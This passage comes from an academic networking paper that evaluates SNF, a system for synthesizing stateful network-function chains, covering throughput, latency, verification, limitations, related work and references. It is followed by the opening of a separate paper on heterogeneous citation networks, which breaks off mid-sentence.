versus the different frames sizes (64, 128, 256, and 1,500 bytes). We implemented the chains in FastClick and a purely software-based SNF using the full capacity of our processor’s socket (i.e., 8 cores in one machine), symmetric RSS, and a batch size of 128 packets. Figure 10A shows that the small ACL (251 rules), executed as a single FastClick instance, achieves satisfactory throughput, equal to its synthesized counterpart. This indicates that a small ISP or a chain deployment in small subnets (e.g., using links with capacity equal or less than 10 Gbps) may not fully benefit from SNF. As depicted in Fig. 10B, the latency is also bounded below 100 µs. This time is dominated by the fact that our traffic flows as follows: traffic originating from one machine enters an SNF server and, after being processed, sent back to the origin server. We believe that the observed latency values are realistic for such a topology. However, for the ACLs with 713 and 8,550 rules the combination of all possible traffic classes among the FW, router, and NAPT boxes causes the classification tree of the chain Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 19/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Figure 10 System’s performance versus 4 frame sizes (64, 128, 256, and 1,500 bytes) of three different ISP-level chains with 251, 713, and 8,550 rules in their ACLs. FastClick and SNF implement these chains in software using 8 CPU cores (in a single machine with four NICs), symmetric RSS, and batch size of 128 packets. Input rates are 40 Gbps for the throughput test and 5 Gbps for the latency test. to explode in size, hence synthesis is a powerful yet necessary solution. This causes three problems for FastClick: (i) the throughput when executing the last two ACLs (713, and 8,550 rules) is reduced by almost 1.5×–10× respectively (on average), (ii) the median latency of the largest ACL is at least an order of magnitude greater than the median latencies of the smaller ACLs (see Fig. 10B), and consequently (iii) the 99th percentile of the latency increases (up to almost 4 ms). In contrast, SNF effectively synthesizes the large ACLs (i.e., 713 and 8,550 rules) maintaining high throughput despite their increasing complexity. In the case of 713 rules, the synthesis is so effective that leads to better throughput than the 251-rule case. Regarding latency, SNF demonstrates 1.1–10× lower median latency (bounded below 500 µs) and 2–3.5× lower latency variance (slightly above 1 ms in some cases). The throughput gain of SNF is up to 8.5× greater than the FastClick chains. Hardware-accelerated SNF The results presented in the previous section show that software-based SNF cannot handle packet processing at a high enough rate when the NFs are complex. We analyzed the root cause and concluded that the packet classifier (that dispatches incoming packets to synthesized NFs) is the bottleneck. To overcome this problem, we run additional experiments, in which we offload packet classification to a hardware OpenFlow switch (since commodity NICs do not offer sufficient programmability). By doing so, we showcase SNF’s ability to scale to high data rates with realistic NFs. In addition, we hint at the performance that is potentially achievable by offloading packet classification to a programmable interface. Throughput measurements This extended version of SNF includes a script that converts the classification rules computed by the original SNF to OpenFlow 1.3 rules. The translation is not straightforward because the switch rules are less expressive than the rules accepted by the NFs. Specifically, rules that match on TCP and UDP port ranges are problematic. While OpenFlow allows only matches on concrete values of ports, naive unrolling of ranges into multiple OpenFlow Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 20/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Figure 11 Hardware-assisted SNF’s performance versus 4 frame sizes (64, 128, 256, and 1,500 bytes) of three different ISP-level chains with 251, 713, and 8,550 rules in their ACLs. SNF’ s classification is of- floaded to an OpenFlow switch, while stateful processing occurs in 4 servers connected to the switch. In- put rates are 40 Gbps for the throughput test and 5 Gbps for the latency test. matches leads to an unacceptable number of rules. Instead, we solve the problem by utilizing a pipeline of flow tables available in the switch. The first two tables match only on the source and destination ports respectively, assign them to ranges, and write metadata that defines the range. Further tables include the real ACL rules and also match on the metadata previously added to a packet. Moreover, since the rules in the NFs are explored in a top-to-bottom order, we emulate the same behavior by assigning decreasing priorities to the OpenFlow rules. We use the same sets of ACLs as before, and evaluate throughput and latency in the hardware-accelerated SNF. We first measure the throughput that SNF can achieve leveraging OpenFlow classification. We design an experiment where two machines use a total of four 10 Gbps links to send traffic. The packets are crafted so that they uniformly exercise all visible classification rules (some rules from the original data set are fully covered by other rules). We use the same frame sizes as in the ‘Real service chain deployments’ section. The switch classifies the packets and forwards them across four SNF servers that are using 10 Gbps links to connect to the switch. The servers work in two modes: (i) forward only, where they do not implement any NFs and simply forward packets (the first bar in each pair in Fig. 11(A), and (ii) synthesized mode, where they implement the real NF chain (the second bar in each pair in Fig. 11(A). Additionally, for comparison, we created an experiment where the switch installs only four basic classification rules (to do simple forwarding) to measure the performance of the NFs themselves (the last pair of bars in Fig. 11(A). We observe that throughput depends mostly on the frame size. The system can operate at almost 20 Gbps for small frames (i.e., 64 bytes), and it reaches the full line-rate for 256-byte frames. Interestingly, the rule set size does not affect the throughput. In the real data sets, the second bar in each pair is almost as high as the first one, which shows that the software part of SNF does not limit the performance. Finally, with simple forwarding rules in the switch (the first pair of bars in Fig. 11(A) the overall throughput is high even for small frames, which confirms that packet processing at the switch is the Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 21/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 bottleneck of the whole system. To further prove this point, we run an experiment with only 2 ports sending traffic at an aggregate speed of 20 Gbps. In this case, SNF processes packets at the line-rate except for the smallest frames, where it achieves 15 Gbps. Latency measurements A middlebox chain should induce low, bounded packet processing delays. In this set of experiments, we send traffic at a lower rate and measure latency. The setup is the same as in the previous scenario. Thus, the latency we show includes the time for frames to be: (i) transmitted out of the network interface of the traffic generating machines, (ii) received, processed, and forwarded by the OpenFlow switch, (iii) received, processed, and forwarded by the SNF machines, and (iv) received by the destination server (the same machine as the sender). Figure 11B shows the latency depending on the frame size and the synthesized function (results for the input rate of 20 Gbps are very similar). Our results show that the median latencies are low and stable across all frame sizes and chains. There are several main observations here. First, the 75th percentiles (marked by the top horizontal line of the boxplots) are close to the median latencies and we find this result to be encouraging. Second, large frames (i.e., 1,500 bytes) face two times greater median latency than the smaller ones regardless of the rule configuration. Third, there are outliers that are an order of magnitude less/greater than the medians (e.g., 10 µs at the 1st and 100 µs at 99th percentiles for 64-byte frames and 80 µs at the 1st and 800 µs at 99th percentiles for MTU-sized frames). Part of this latency variance is due to the batch I/O and processing techniques of the FastClick framework; as shown in Fig. 11, these techniques offer high throughput, but have a well-studied effect on the latency variance. VERIFICATION In this section we discuss tools that could potentially be utilized to systematically verify the correctness of the synthesis proposed by SNF. Recent efforts have employed model checking (Canini et al., 2012; Kim et al., 2015a) techniques to explore the (voluminous) state space of modern networked systems in an attempt to find state inconsistencies due to etc. bugs or misconfigurations. Symbolic execution has also been utilized either alone (Kuzniar et al., 2012; Dobrescu & Argyraki, 2014) or combined with model checking (Canini et al., 2012), to systematically identify representative input events (i.e., packets) that can adequately exercise code paths without requiring exhaustive exploration of the input space (hence bounding the verification time). Specifically, Software Dataplane Verification (Dobrescu & Argyraki, 2014) might be suitable for verifying NFV service chains. Dobrescu and Argyraki proposed a scalable approach to verifying complex NFV pipelines, by verifying each internal element of the pipeline in isolation; then by composing the results the authors proved certain properties about the entire pipeline. One could use this tool to systematically verify a complex part of SNF, which is the traffic classification. However, this tool might not be able to provide sound proofs regarding all the stateful modifications of SNF, since the authors verified Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 22/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 only two simple stateful cases (i.e., a NAT and a traffic monitor) and did not generalize their ideas for a broader list of NFV flow modification elements. SOFT (Kuzniar et al., 2012) could also be employed to test the interoperability between a chain realized with and without SNF. In other words, SOFT could inject a broad set of inputs to test whether the SynthesizedNF defined in the ‘Abstract service chain representation’ section outputs packets that are identical with the packets delivered by the original set of NFs. Similarly, HSA (Kazemian, Varghese & McKeown, 2012) could be used to verify loop-freedom, slice isolation, and reachability properties of SNF service chains. Unfortunately, HSA statically operates on a snapshot of the network configuration, hence is unable to track dynamic state modifications caused by continuous events. SOFT is a special-purpose verification engine for software-defined networking (SDN) agent implementations. Therefore, both works would require significant additional effort to verify stateful NFV pipelines. Finally, translating an SNF processing graph into a finite state machine understandable by Kinetic (Kim et al., 2015a) would potentially allow Kinetic to use its model checker to verify certain properties for the entire pipeline. However, Kinetic does not systematically verify the actual code that runs in the network, but rather builds and verifies a model of this code. Therefore, it is unclear (i) whether a Kinetic model can sufficiently cover complex service chains such as the ISP-level chains presented in the ‘Real service chain deployments’ section and (ii) whether Kinetic’s located packet equivalence classes (LPECs) can handle the complex TCUs of SNF without causing state space explosion. To summarize, although the works above have provided remarkable advancements in software verification, a substantial amount of additional research is required to provide strong guarantees about the correctness of SNF. For this reason, in this paper we focus our attention on delivering high speed pipelines for complex and stateful NFV service chains and leave the verification of SNF as a future work. LIMITATIONS We do not attempt to provide a solution that can synthesize arbitrary software components, but rather target a broad but finite set of middlebox-specific NFs that operate on the entire space of a packet’s header. SNF makes two assumptions: (1) An NFV provider must specify an NF as an ensemble of abstract packet processing elements (i.e., the NF DAG defined in the ‘Service chain configuration’ section). We believe that this is a reasonable assumption, followed also by other state of the art approaches, such as Click, Slick, and OpenBox. However, if a middlebox provider does not want to share this information, under non-disclosure or via a licensing agreement, then SNF can synthesize the middleboxes before and after this provider’s middlebox. This is possible by omitting the processing graph of this middlebox from the inputs given to the Service Chain Configurator (see the ‘Service chain configuration’ section). (2) No further decision (i.e., read) utilizes an already rewritten field, therefore, an LB that splits traffic based on source port after a source NAPT, might not be synthesizable. In such a case, SNF can exclude the LB from the synthesis. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 23/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Moreover, our tool does not support network-wide placement of the chain’s components, but we envision SNF being integrated in controllers, such as E2 or Slick. RELATED WORK Over the last decade, there has been considerable evolution of software-based packet processing architectures that realize wireline throughputs, while providing flexible and cost effective in-cloud network processing. Monolithic middlebox implementations. Until recently, most NFV approaches have treated NFs as monolithic entities placed at arbitrary locations in the network. In this context, even with the assistance of state of the art OSs, such as the Click-based ClickOS (Martins et al., 2014) together with fast network I/O (Rizzo, 2012; DPDK, 2016) and processing (Kim et al., 2012; Kim et al., 2015b; Barbette, Soldani & Mathy, 2015) mechanisms, chaining more than 2 NFs leads to serious performance degradation as stated by the authors of both ClickOS and NetVM (Hwang, Ramakrishnan & Wood, 2014). The main reason, as shown in our experiments, for this poor performance is the I/O overhead due to forwarding packets along physically remote and virtualized NFs. More recently, OpenNetVM (Zhang et al., 2016) showed that VM-based NFV deployments do not scale with increasing number of chained instances, hence opted for NFs running in lightweight Docker containers (Docker, San Francisco, CA, USA) interconnected with shared memory segments. Consolidation at the machine level. Concentrating network processing into a single machine is a logical way to overcome the limitations stated above. CoMb (Sekar et al., 2012) consolidates middlebox-oriented flow processing into one machine, mainly at the session layer. Similarly, OpenNF (Gember-Jacobson et al., 2014) provides a programming interface to migrate NFs, which can in turn be collocated in a physical server. DPIaaS (Bremler-Barr et al., 2014) reuses the costly deep packet inspection (DPI) logic across multiple instances. RouteBricks (Dobrescu et al., 2009) exploits parallelism to scale software routers across multiple servers and cores within a single server, while PacketShader (Han et al., 2010) and NBA (Kim et al., 2015b) take advantage of cheap and powerful auxiliary hardware components (such as GPUs) to provide fast packet processing. All of these works only partially exploit the benefits of sharing common middlebox functionality, thus they are far from supporting optimized service chains. Consolidation at the individual function level is the next level of composition of scalable and efficient NF deployments. In this context, Open Middleboxes (xOMB) by Anderson et al. (2012) proposes an incrementally scalable network processing pipeline based on triggers that pass the flow control from one element to another in a pipeline. The xOMB architecture allows great flexibility in sharing parts of the pipeline; however, it only targets request-oriented protocols and services, unlike our generic framework. Slick (Anwer et al., 2015) operates on the same level of packet processing as SNF to compose distributed, network-wide service chains driven by a controller. Slick provides its own programming language to achieve this composition and unlike our work, it addresses placement requirements. Slick is very efficient when deploying service chains that are not Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 24/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 necessarily collocated. However, we argue that in many cases all the NFs of a service chain need to be deployed in one machine to effectively dispatch processing across cores in the same socket. Slick does not allow all of the NF elements to be physically placed into a single process. Our work goes beyond Slick by trading the flexibility of placing NF elements on demand for extensive consolidation of the chain processing. Our synthesized SNF realizes such chains with zero redundancy of individual packet operations. Very recently, Bremler-Barr, Harchol & Hay (2016) applied the SDN control and dataplane separation paradigm to OpenBox; a framework for network-wide deployment and management of NFs. OpenBox applications input different NF specifications to the OpenBox controller via a north-bound application programming interface. The controller communicates the NF specifications to the OpenBox Instances (OBIs) that constitute the actual dataplane, ensuring smart NF placement and scaling. An interesting feature of the OpenBox controller is its ability to merge different processing graphs, from different NFs, into a single and shorter processing graph, similar to our SNF. The authors of OpenBox made a similar observation with us regarding the need to classify the traffic of a service chain only once, and then apply a set of operations that originate from the different NFs of the chain. However, OpenBox does not highly optimize the result chain-level processing graph for two reasons: (i) The OpenBox merge algorithm can only merge homogeneous packet modification elements (i.e., elements with the same type). For example, two ‘‘Decrement IP TTL’’ elements, that each decrements the TTL field by one, can be merged into a single element that directly decrements the TTL field by two. Imagine, however, the case where OpenBox has to merge the NFs of Fig. 5. In this example, OpenBox cannot merge the ‘‘Rewrite Flow’’ element (that modifies the source and destination IP addresses as well as the source port of UDP packets) with the 3 ‘‘Decrement IP TTL’’ elements, since these elements do not belong to the same type. This means that the final OpenBox graph will have 2 distinct packet modification elements (i.e., 1 ‘‘Rewrite Flow’’ and 1 ‘‘Decrement IP TTL’’) and each element has to compute the IP and UDP checksums separately. Therefore, OpenBox does not completely eliminate redundant operations. In contrast, SNF effectively synthesized the operations of all these elements into a single element (see Fig. 6) that computes the IP and UDP checksums only once. Consequently, SNF produces both a shorter processing graph and a synthesized chain with no redundancy, hence achieving lower latency. (ii) Although OpenBox can merge the classification elements of a chain into a single classifier, the authors have not addressed how they handle the increased complexity of the final classifier. Our preliminary experiments showed that in complex use cases, such as the ISP-level traffic classification presented in the ‘Real service chain deployments’ section, the complexity of the chain-level classifier dramatically increases with increasing number of ACL rules. Therefore, SNF implements the lazy subtraction technique proposed by Kazemian, Varghese & McKeown (2012). The benefits of this technique are stated in the ‘FastClick extensions’ section. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 25/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 Finally, the authors of OpenBox did not stress the limits of the OpenBox framework in their performance evaluation. An input packet rate of 1–2 Gbps cannot adequately stress the memory utilization of the OBIs. Moreover, there is limited discussion related to how OpenBox exploits the multi-core capacities of modern NFV infrastructures. In contrast, in the ‘A chain of routers at the cost of one,’ ‘Stateful service chaining’ and ‘Real service chain deployments’ sections we demonstrated how SNF realizes complex, purely software-based service chains at 40 Gbps line-rate. This is possible by exploiting multiple CPU cores and by fitting most of the data of an entire service chain into those cores’ L1 caches. Scheduling NFs for high throughput. Recently, the E2 NFV framework (Palkar et al., 2015) demonstrated a scalable way of deploying NFV services. E2 mainly tackles placement, elastic scaling, and service composition by introducing pipelets. A pipelet defines a traffic class and a corresponding DAG of NFs that should process this traffic class. SNF’s TCUs are somewhat similar to E2’s pipelets, but SNF aims to make them more efficient. Concretely, an SNF TCU is not processed by a DAG of NFs, but rather by a highly optimized piece of code (produced by the synthesizer) that directly applies a set of operations to this specific traffic class. Impact. E2 can use SNF to fit more service chains into one machine, hence postpone its elastic scaling. Existing approaches can transparently use our extensions to provide services such as (i) lightweight Xen VMs that run synthesized ClickOS instances using the netmap network I/O, (ii) parallelized service chains using the multi-server, multi-core RouteBricks architecture, and (iii) synthesized chains that are load balanced across heterogeneous hardware components (i.e., CPU and GPU) using NBA. CONCLUSION We have addressed the problem of synthesizing chains of NFs with SNF. SNF requires minimal I/O interactions with the NFV platform and applies single-read-single-write operations on the packets, while early-discarding irrelevant traffic classes. SNF maintains state across NFs. To realize the above properties, we parse the chained NFs and build a classification graph whose leaves represent unique traffic class units. In each leaf we perform a set of packet header modifications to generate an equivalent configuration that implements the same functionality as the initial chain using a minimal set of elements. SNF synthesizes stateful chains that appear in production ISP-level networks realizing high throughput and low latency, while outperforming state of the art works. ADDITIONAL INFORMATION AND DECLARATIONS Funding The research leading to these results has been co-funded by the European Union (EU) in the context of (i) the European Research Council under EU’s Seventh Framework Programme (FP7/2007-2013) / ERC grant agreement 259110 and (ii) the BEhavioural BAsed forwarding (BEBA) project with grant agreement number 644122. There was no Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 26/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.98 additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Competing Interests The authors declare there are no competing interests. Author Contributions • Georgios P. Katsikas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Marcel Enguehard conceived and designed the experiments, performed the computation work, reviewed drafts of the paper. • Maciej Kuźniar conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Gerald Q. Maguire Jr and Dejan Kostić wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Github: https://github.com/gkatsikas/fastclick/tree/snf. REFERENCES Anderson JW, Braud R, Kapoor R, Porter G, Vahdat A. 2012. xOMB: extensible open middleboxes with commodity servers. In: Proceedings of the eighth ACM/IEEE symposium on architectures for networking and communications systems, ANCS ’12. New York, NY, USA: ACM, 49–60. Anwer B, Benson T, Feamster N, Levin D. 2015. Programming slick network functions. In: Proceedings of the 1st ACM SIGCOMM symposium on software defined networking research, SOSR ’15. New York, NY, USA: ACM, 14:1–14:13. Bagnulo M, Matthews P, Van Beijnum I. 2011. Stateful NAT64: network address and protocol translation from IPv6 clients to IPv4 servers. Request for Comments (RFC) 6146 (Proposed Standard). The Internet Engineering Task Force, Fremont. Available at https://www.rfc-editor.org/rfc/rfc6146.txt. Barbette T, Soldani C, Mathy L. 2015. Fast userspace packet processing. In: Proceedings of the eleventh ACM/IEEE symposium on architectures for networking and communica- tions systems, ANCS ’15. Piscataway: IEEE Computer Society, 5–16. Bremler-Barr A, Harchol Y, Hay D. 2016. OpenBox: a software-defined framework for developing, deploying, and managing network functions. In: Proceedings of the 2016 conference on ACM SIGCOMM 2016 conference, SIGCOMM ’16. New York: ACM, 511–524. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 27/30 https://peerj.com https://github.com/gkatsikas/fastclick/tree/snf https://www.rfc-editor.org/rfc/rfc6146.txt http://dx.doi.org/10.7717/peerj-cs.98 Bremler-Barr A, Harchol Y, Hay D, Koral Y. 2014. Deep packet inspection as a service. In: Proceedings of the 10th ACM international on conference on emerging networking experiments and technologies, CoNEXT ’14. New York: ACM, 271–282. Canini M, Venzano D, Perešíni P, Kostić D, Rexford J. 2012. A NICE way to test openflow applications. In: Proceedings of the 9th USENIX conference on networked systems design and implementation, NSDI ’12. Berkeley: USENIX Association, 10. Cisco. 2014. Scaling NFV—the performance challenge. Available at http://blogs.cisco.com/ enterprise/scaling-nfv-the-performance-challenge. Dobrescu M, Argyraki K. 2014. Software dataplane verification. In: Proceedings of the 11th USENIX conference on networked systems design and implementation, NSDI ’14. Berkeley: USENIX Association, 101–114. Dobrescu M, Argyraki K, Iannaccone G, Manesh M, Ratnasamy S. 2010. Controlling parallelism in a multicore software router. In: Proceedings of the workshop on programmable routers for extensible services of tomorrow, SOSP ’09. New York: ACM, 2:1–2:6. Dobrescu M, Egi N, Argyraki K, Chun B-G, Fall K, Iannaccone G, Knies A, Manesh M, Ratnasamy S. 2009. RouteBricks: exploiting parallelism to scale software routers. In: Proceedings of the ACM SIGOPS 22nd symposium on operating systems principles. New York: ACM, 15–28. DPDK. 2016. Data plane development kit (DPDK). Available at http://dpdk.org. Emmerich P, Gallenmüller S, Raumer D, Wohlfart F, Carle G. 2015. MoonGen: a scriptable high-speed packet generator. In: Proceedings of the 2015 ACM conference on internet measurement conference, IMC ’15. New York: ACM, 275–287. Enguehard M. 2016. Hyper-NF: synthesizing chains of virtualized network functions. Masters thesis, KTH School of Information and Communication Technology (ICT) Available at http://kth.diva-portal.org/smash/get/diva2:893670/FULLTEXT01. European Telecommunications Standards Institute. 2012. NFV whitepaper. Available at https://portal.etsi.org/NFV/NFV_White_Paper.pdf. Evans D. 2011. The internet of things: how the next evolution of the internet is changing everything. Cisco Internet Business Solutions Group (IBSG), 1–11. Available at https: //www.cisco.com/c/dam/en_us/about/ac79/docs/innov/IoT_IBSG_0411FINAL.pdf . Gember-Jacobson A, Viswanathan R, Prakash C, Grandl R, Khalid J, Das S, Akella A. 2014. OpenNF: enabling innovation in network function control. In: Proceedings of the 2014 ACM conference on SIGCOMM, SIGCOMM ’ 14. New York: ACM, 163–174. Han S, Jang K, Park K, Moon S. 2010. PacketShader: a GPU-accelerated software router. ACM SIGCOMM Computer Communication Review 40(4):195–206 DOI 10.1145/1851275.1851207. Hwang J, Ramakrishnan KK, Wood T. 2014. NetVM: high performance and flexible networking using virtualization on commodity platforms. In: Proceedings of the 11th USENIX conference on networked systems design and implementation, NSDI ’14. Berkeley: USENIX Association, 445–458. Intel. 2016. Receiver-Side Scaling (RSS). Available at http://www.intel.com/content/dam/ support/us/en/documents/network/sb/318483001us2.pdf. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 28/30 https://peerj.com http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://blogs.cisco.com/enterprise/scaling-nfv-the-performance-challenge http://dpdk.org http://kth.diva-portal.org/smash/get/diva2:893670/FULLTEXT01 https://portal.etsi.org/NFV/NFV_White_Paper.pdf https://www.cisco.com/c/dam/en_us/about/ac79/docs/innov/IoT_IBSG_0411FINAL.pdf https://www.cisco.com/c/dam/en_us/about/ac79/docs/innov/IoT_IBSG_0411FINAL.pdf http://dx.doi.org/10.1145/1851275.1851207 http://www.intel.com/content/dam/support/us/en/documents/network/sb/318483001us2.pdf http://www.intel.com/content/dam/support/us/en/documents/network/sb/318483001us2.pdf http://dx.doi.org/10.7717/peerj-cs.98 Katsikas GP. 2016. SNF extensions of FastClick’s stateful flow processing elements. Available at https://github.com/gkatsikas/fastclick/tree/snf. Kazemian P, Varghese G, McKeown N. 2012. Header space analysis: static checking for networks. In: Proceedings of the 9th USENIX conference on networked systems design and implementation. Berkeley: USENIX Association, 9–9. Kim H, Reich J, Gupta A, Shahbaz M, Feamster N, Clark R. 2015a. Kinetic: verifiable dy- namic network control. In: Proceedings of the 12th USENIX conference on networked systems design and implementation, NSDI ’15. Berkeley: USENIX association, 59–72. Kim J, Huh S, Jang K, Park K, Moon S. 2012. The power of batching in the click modular router. In: Proceedings of the Asia–Pacific workshop on systems, APSYS ’12. New York: ACM, 14:1–14:6. Kim J, Jang K, Lee K, Ma S, Shim J, Moon S. 2015b. NBA (Network Balancing Act): a high-performance packet processing framework for heterogeneous processors. In: Proceedings of the tenth European conference on computer systems, EuroSys ’15. New York: ACM, 22:1–22:14. Kohler E, Morris R, Chen B, Jannotti J, Kaashoek MF. 2000. The click modular router. ACM Transactions on Computer Systems 18(3):263–297 DOI 10.1145/354871.354874. Kuzniar M, Peresini P, Canini M, Venzano D, Kostić D. 2012. A SOFT way for openflow switch interoperability testing. In: Proceedings of the 8th international conference on emerging networking experiments and technologies, CoNEXT ’12. New York: ACM, 265–276. Liu W, Li H, Huang O, Boucadair M, Leymann N, Fu Q, Sun Q, Pham C, Huang C, Zhu J, He P. 2014. Service function chaining (SFC) general use cases. Internet-draft draft- liu-sfc-use-cases-08. IETF Secretariat. Available at https://tools.ietf.org/html/draft- liu-sfc-use-case-08. Martins J, Ahmed M, Raiciu C, Olteanu V, Honda M, Bifulco R, Huici F. 2014. ClickOS and the art of network function virtualization. In: Proceedings of the 11th USENIX conference on networked systems design and implementation, NSDI ’14. Berkeley: USENIX Association, 459–473. McKeown N, Anderson T, Balakrishnan H, Parulkar G, Peterson L, Rexford J, Shenker S, Turner J. 2008. OpenFlow: enabling innovation in campus networks. ACM SIGCOMM Computer Communication Review 38(2):69–74 DOI 10.1145/1355734.1355746. Palkar S, Lan C, Han S, Jang K, Panda A, Ratnasamy S, Rizzo L, Shenker S. 2015. E2: a framework for NFV applications. In: Proceedings of the 25th symposium on operating systems principles, SOSP ’15. New York: ACM, 121–136. Penno R, Wing D, Boucadair M. 2013. PCP support for nested NAT environments. Internet-draft draft-penno-pcp-nested-nat-03. IETF Secretariat. Available at https: //tools.ietf.org/html/draft-penno-pcp-nested-nat-03. Perreault S, Yamagata I, Miyakawa S, Nakagawa A, Ashida H. 2013. Common re- quirements for carrier-grade NATs (CGNs). RFC 6888 (Best Current Practice). The Internet Engineering Task Force, Fremont. Available at https://www.rfc-editor.org/ rfc/rfc6888.txt. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 29/30 https://peerj.com https://github.com/gkatsikas/fastclick/tree/snf http://dx.doi.org/10.1145/354871.354874 https://tools.ietf.org/html/draft-liu-sfc-use-case-08 https://tools.ietf.org/html/draft-liu-sfc-use-case-08 http://dx.doi.org/10.1145/1355734.1355746 https://tools.ietf.org/html/draft-penno-pcp-nested-nat-03 https://tools.ietf.org/html/draft-penno-pcp-nested-nat-03 https://www.rfc-editor.org/rfc/rfc6888.txt https://www.rfc-editor.org/rfc/rfc6888.txt http://dx.doi.org/10.7717/peerj-cs.98 Quinn P, Nadeau T. 2015. Problem statement for service function chaining. RFC 7498 (Informational). The Internet Engineering Task Force, Fremont. Available at https: //www.rfc-editor.org/rfc/rfc7498.txt. Rizzo L. 2012. Netmap: a novel framework for fast packet I/O. In: Proceedings of the 2012 USENIX conference on annual technical conference, USENIX ATC ’12. Berkeley: USENIX Association, 9–9. SDX Central. 2015. Performance—still fueling the NFV discussion. Available at https: //www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion- kelly-leblanc/2015/05. Sekar V, Egi N, Ratnasamy S, Reiter MK, Shi G. 2012. Design and implementation of a consolidated middlebox architecture. In: Proceedings of the 9th USENIX conference on networked systems design and implementation, NSDI ’12. Berkeley: USENIX Association, 24–24. Sherry J, Hasan S, Scott C, Krishnamurthy A, Ratnasamy S, Sekar V. 2012. Making middleboxes someone else’s problem: network processing as a cloud service. In: Proceedings of the ACM SIGCOMM 2012 conference on applications, technologies, architectures, and protocols for computer communication, SIGCOMM ’12. New York: ACM, 13–24. Sun W, Ricci R. 2013. Fast and flexible: parallel packet processing with GPUs and click. In: Proceedings of the ninth ACM/IEEE symposium on architectures for networking and communications systems, ANCS ’13. Piscataway: IEEE Press, 25–36Available at http://dl.acm.org/citation.cfm?id=2537857.2537861. Taylor DE, Turner JS. 2007. ClassBench: a packet classification benchmark. IEEE/ACM Transactions on Networking 15(3):499–511 DOI 10.1109/TNET.2007.893156. Woo S, Park K. 2012. Scalable TCP session monitoring with symmetric receive-side scaling. KAIST Technical Report. KAIST, Daejeon, 1–7. Zhang W, Liu G, Zhang W, Shah N, Lopreiato P, Todeschi G, Ramakrishnan K, Wood T. 2016. OpenNetVM: a platform for high performance network service chains. In: Proceedings of the 2016 ACM SIGCOMM workshop on hot topics in middleboxes and network function virtualization. New York: ACM. Katsikas et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.98 30/30 https://peerj.com https://www.rfc-editor.org/rfc/rfc7498.txt https://www.rfc-editor.org/rfc/rfc7498.txt https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/2015/05 https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/2015/05 https://www.sdxcentral.com/articles/contributed/vnf-performance-fueling-nfv-discussion-kelly-leblanc/2015/05 http://dl.acm.org/citation.cfm?id=2537857.2537861 http://dx.doi.org/10.1109/TNET.2007.893156 http://dx.doi.org/10.7717/peerj-cs.98 work_5i3wjeon5zeghmnvsvaas77wem ---- Heterogeneous Networks and Their Applications: Scientometrics, Name Disambiguation, and Topic Modeling Heterogeneous Networks and Their Applications: Scientometrics, Name Disambiguation, and Topic Modeling Ben King, Rahul Jha Department of EECS University of Michigan Ann Arbor, MI {benking,rahuljha}@umich.edu Dragomir R. Radev Department of EECS School of Information University of Michigan Ann Arbor, MI radev@umich.edu Abstract We present heterogeneous networks as a way to unify lexical networks with relational data. We build a unified ACL Anthology network, tying together the citation, author collaboration, and term-cooccurence networks with affiliation and venue relations. This representation proves to be convenient and allows problems such as name disambiguation, topic modeling, and the mea- surement of scientific impact to be easily solved using only this network and off-the-shelf graph algorithms. 1 Introduction Graph-based methods have been used to great ef- fect in NLP, on problems such as word sense disam- biguation (Mihalcea, 2005), summarization (Erkan and Radev, 2004), and dependency parsing (McDon- ald et al., 2005). Most previous studies of networks consider networks with only a single type of node, and in some cases using a network with a single type of node can be an oversimplified view if it ignores other types of relationships. In this paper we will demonstrate heterogeneous networks, networks with multiple different types of nodes and edges, along with several applications of them. The applications in this paper are not pre- sented so much as robust attempts to out-perform the current state-of-the-art, but rather attempts at being competitive against top methods with little effort be- yond the construction of the heterogeneous network. Throughout this paper, we will use the data from the ACL Anthology Network (AAN) (Bird et al., 2008; Radev et al., 2013), which contains additional metadata relationships not found in the ACL Anthol- ogy, as a typical heterogeneous network. The results in this paper should be generally applicable to other heterogeneous networks. 1.1 Heterogeneous AAN schema We build a heterogeneous graph G(V,E) from AAN, where V is the set of vertices and E is the set of edges connecting vertices. A vertex can be one of five semantic types: {paper, author, venue, institution, term}. An edge can also be one of five types, each connecting different types of vertices: • author — [writes] — paper • paper — [cites] — paper • paper — [published in] — venue1 • author — [affiliated with] — institution2 • paper — [contains] — term All of this data, except for the terms, is available for all papers in the 2009 release of AAN. Terms are extracted from titles by running TextRank (Mihal- cea and Tarau, 2004) on NP-chunks from titles and manually filtering out bad terms. We show the usefulness of this representation in several applications: the measurement of scien- tific impact (Section 2), name disambiguation (Sec- tion 